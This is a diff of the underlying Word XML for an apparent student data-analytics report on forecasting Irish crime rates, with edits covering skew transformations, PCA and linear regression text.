                         </w:rPr>
                         <w:t xml:space="preserve">As the result, </w:t>
                       </w:r>
+                      <w:proofErr w:type="spellStart"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
                         <w:t>them</w:t>
                       </w:r>
+                      <w:proofErr w:type="spellEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
@@ -12235,16 +12946,7 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>Log transformation is a common way to handle right-skewed data</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> It can be used to improve the normality of the data, which is a requirement for </w:t>
-      </w:r>
-      <w:r>
-        <w:t>regression models.</w:t>
+        <w:t>Log transformation is a common way to handle right-skewed data. It can be used to improve the normality of the data, which is a requirement for regression models.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12317,16 +13019,7 @@
                               </w:rPr>
                             </w:pPr>
                             <w:r>
-                              <w:t xml:space="preserve">Log transformation </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t>proved to be more effective than the square root</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> and cube root</w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t xml:space="preserve"> in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
+                              <w:t>Log transformation proved to be more effective than the square root and cube root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -12359,16 +13052,7 @@
                         </w:rPr>
                       </w:pPr>
                       <w:r>
-                        <w:t xml:space="preserve">Log transformation </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t>proved to be more effective than the square root</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> and cube root</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t xml:space="preserve"> in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
+                        <w:t>Log transformation proved to be more effective than the square root and cube root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -12581,10 +13265,7 @@
                               </w:rPr>
                             </w:pPr>
                             <w:r>
-                              <w:t xml:space="preserve">Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for </w:t>
-                            </w:r>
-                            <w:r>
-                              <w:t>regression.</w:t>
+                              <w:t>Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for regression.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -12617,10 +13298,7 @@
                         </w:rPr>
                       </w:pPr>
                       <w:r>
-                        <w:t xml:space="preserve">Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for </w:t>
-                      </w:r>
-                      <w:r>
-                        <w:t>regression.</w:t>
+                        <w:t>Even after handling the skew with reciprocal transformation, the data was reduced to zeros, which is not useful for regression.</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -12664,25 +13342,18 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The best approach was applying both </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Log transformation and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Reciprocal transformation consecutively</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, which handled the skewness</w:t>
+        <w:t>The best approach was applying both Log transformation and Reciprocal transformation consecutively, which handled the skewness</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">successful and it </w:t>
-      </w:r>
-      <w:r>
-        <w:t>is still suitable for regressio</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>successful</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and it is still suitable for regressio</w:t>
       </w:r>
       <w:r>
         <w:t>n.</w:t>
@@ -12808,8 +13479,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Square Transformation;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Square </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Transformation;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12832,8 +13514,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Cubes Transformation;</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Cubes </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Transformation;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12986,16 +13679,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Applying square or cube transformation was effective at reducing skewness, but it was not enough to fully adjust the highly skewed column</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. The best option is to apply both transformations</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Applying square or cube transformation was effective at reducing skewness, but it was not enough to fully adjust the highly skewed columns. The best option is to apply both transformations.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13095,7 +13779,11 @@
         <w:t xml:space="preserve">a good approach to reduce </w:t>
       </w:r>
       <w:r>
-        <w:t>the dimension</w:t>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>dimension</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">,  </w:t>
@@ -13104,7 +13792,11 @@
         <w:t>f</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">or this </w:t>
+        <w:t>or</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> this </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">purpose, </w:t>
@@ -13147,8 +13839,49 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>pply PCA with 10 n_components to evaluate wich will be the best components number</w:t>
-      </w:r>
+        <w:t xml:space="preserve">pply PCA with 10 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>n_components</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to evaluate </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>wich</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> will be the best components </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>number</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13220,13 +13953,7 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Based on this chart, we can assume that the best number of </w:t>
-      </w:r>
-      <w:r>
-        <w:t>components</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is 5, because from 1 to 5 they explain over 90% of the variance in the data. After 5 components, the variance explained by each additional component drops off sharply, indicating that these components are not capturing much important information.</w:t>
+        <w:t>Based on this chart, we can assume that the best number of components is 5, because from 1 to 5 they explain over 90% of the variance in the data. After 5 components, the variance explained by each additional component drops off sharply, indicating that these components are not capturing much important information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13261,7 +13988,39 @@
           </w14:textOutline>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Predicting Crime Rate  after applying PCA.</w:t>
+        <w:t xml:space="preserve">Predicting Crime </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t>Rate  after</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
+          <w:lang w:val="en-IE" w:eastAsia="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:bevel/>
+          </w14:textOutline>
+        </w:rPr>
+        <w:t xml:space="preserve"> applying PCA.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13275,7 +14034,15 @@
         <w:t>predicting</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> the crime rate, Its necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
+        <w:t xml:space="preserve"> the crime rate, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> necessary to use Machine Learning to predict the number of crime in a given year.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13311,7 +14078,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">For this purpose it’s the best option because the variables and the target are </w:t>
+        <w:t xml:space="preserve">For this </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>purpose</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> it’s the best option because the variables and the target are </w:t>
       </w:r>
       <w:r>
         <w:t>known</w:t>
@@ -13491,16 +14266,18 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Based on the MSE and </w:t>
-      </w:r>
-      <w:r>
-        <w:t>R^2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> results, we can assume that the model is performing well, and can be applied in a new dataset.</w:t>
+        <w:t>Based on the MSE and R^</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">2 </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> results</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>, we can assume that the model is performing well, and can be applied in a new dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13655,12 +14432,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="NormalWeb"/>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -13668,16 +14439,18 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">After Understanding PCA e Linear Regression, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> we will now use only the principal features of our datasets to predict population growth and crime rates.</w:t>
+        <w:t xml:space="preserve">After Understanding PCA e Linear </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">Regression, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> we</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> will now use only the principal features of our datasets to predict population growth and crime rates.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13685,22 +14458,27 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">First, we will 2023 to predict population growth for the next </w:t>
+        <w:t xml:space="preserve">First, we </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>will to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> predict </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">population growth for the next </w:t>
       </w:r>
       <w:r>
         <w:t>8</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> years. Then, we will use this result as an input to a linear regression model to predict crime rates for the next </w:t>
-      </w:r>
-      <w:r>
-        <w:t>8</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> years.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> years. Then, we will use this result as an input to a linear regression model to predict crime rates for the next 8 years. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13709,6 +14487,141 @@
       </w:pPr>
       <w:r>
         <w:t>Predicting Population growth:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For this purpose, I’ve created a new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dataframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with a range of years from 2023 to 2030, and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aplyied</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the model </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lr_pop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">” to predict the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>popularion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72044DDC" wp14:editId="2A2BD64D">
+            <wp:extent cx="5191125" cy="2828925"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="1394955231" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1394955231" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId42"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5191125" cy="2828925"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>fter</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>applyied</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the outcome in a new model </w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lr_crime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">”, to predict the crime rate based on the population </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>outcomed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13741,7 +14654,29 @@
           <w:lang w:val="fr-FR"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3.1 Sample Report </w:t>
+        <w:t xml:space="preserve">3.1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Sample</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13902,7 +14837,31 @@
           <w:u w:color="000000"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">3.5 Sample Report </w:t>
+        <w:t xml:space="preserve">3.5 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>Sample</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Report </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14006,7 +14965,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="26F5F61D">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="690EEEA6" wp14:editId="36B38C43">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
               <wp:posOffset>0</wp:posOffset>
@@ -14029,7 +14988,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42" cstate="print">
+                    <a:blip r:embed="rId43" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -14060,7 +15019,7 @@
     <w:p/>
     <w:p/>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId43"/>
+      <w:footerReference w:type="default" r:id="rId44"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
       <w:pgBorders w:offsetFrom="page">

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -5345,7 +5345,23 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>CJQ01-recorded_crime_2002-2023.csv</w:t>
+        <w:t>CJQ01-recorded_crime_2002-202</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.csv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8419,6 +8435,8 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
@@ -8427,6 +8445,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
@@ -8438,18 +8458,12 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>We can see the top 10 most common type of offenc</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e:</w:t>
+      </w:pPr>
+      <w:r>
+        <w:t>From the crime</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dataset, we can get some information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8457,10 +8471,258 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Wh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ich Garda Station has registered more </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t>incidents,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t xml:space="preserve">which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t xml:space="preserve">one </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t>has registered less incidents</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4814"/>
+        <w:gridCol w:w="4814"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4814" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>More Incidents:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6581994F" wp14:editId="6522E9B4">
+                  <wp:extent cx="2620010" cy="1126958"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="842790805" name="Picture 1" descr="A screenshot of a phone&#10;&#10;Description automatically generated"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
